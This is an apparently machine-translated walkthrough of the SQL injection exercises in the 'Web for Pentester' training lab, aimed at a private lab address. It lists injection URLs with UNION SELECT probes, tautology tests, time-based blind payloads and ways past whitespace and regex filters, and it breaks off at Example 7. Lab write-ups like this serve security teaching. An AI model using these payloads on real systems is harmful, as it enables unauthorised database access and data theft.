Home > Others

"Penetration Test Learning Platform" web for Pentester-2.sql injection

Source: Internet
Author: User
Tags sql injection
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

Example 1

Injection of character type, no filtering

Http://192.168.91.139/sqli/example1.php?name=root

Http://192.168.91.139/sqli/example1.php?name=root ' and 1=1%23

Http://192.168.91.139/sqli/example1.php?name=root ' and 1=2%23

Http://192.168.91.139/sqli/example1.php?name=root ' Union Select 1,2,3,4,5%23

Example 2

Similar to example1, filter the space, the statement of the blank space will be an error

MySQL injects a way to bypass whitespace filtering:

1. Horizontal tabulation (HT) URL code:%09

2. Comment Bypass Space/* Comment */

3, parentheses around the method of space, in the time based blind

Index.php?id= (The Sleep (ASCII (Mid (User () from (2) for (1)) =109))

Features: 1) Neither the comma, the size of the symbol 2) or the use of space but can complete the data of the guessing work!

Http://192.168.91.139/sqli/example2.php?name=root '%09and%091=1%23

Http://192.168.91.139/sqli/example2.php?name=root '%09and%091=2%23

Http://192.168.91.139/sqli/example2.php?name=root '/**/union/**/select/**/1,2,3,4,5%23

Example 3

On the basis of example, \s matches any whitespace characters, including spaces, tabs, page breaks, etc., all filtered out

You can use/* comments in Example2 */Bypass filtering

Http://192.168.91.139/sqli/example3.php?name=root '/**/union/**/select/**/1,2,3,4,5%23

Example 4

Numeric injection, filtering of single quotes, etc., invalid for numeric type

Http://192.168.91.139/sqli/example4.php?id=3 Union Select 1,2,3,4,5

Example 5

Similar to the previous one, which begins with a number, and can be added to a constructed SQL statement for attack testing

http://192.168.91.139/sqli/example5.php?id=2 and 1=1--

http://192.168.91.139/sqli/example5.php?id=2 and 1=2--

Example 6

The regular expression value ensures that the parameter ID is terminated with a number. He cannot ensure that the ID parameter begins with a valid one.

You can work around the detection method mentioned earlier. You just need to add a number to the back of your payload. For example, you can do this: 1 or 1=1 # 123.

http://192.168.91.139/sqli/example6.php?id=2 Union Select 1,2,3,4,5%23 123

Example 7

"Penetration Test Learning Platform" web for Pentester-2.sql injection

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
test website for sql injection online test website for sql injection vulnerability sql injection test string sql injection test page basic sql injection test php sql injection test sql injection attack test

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More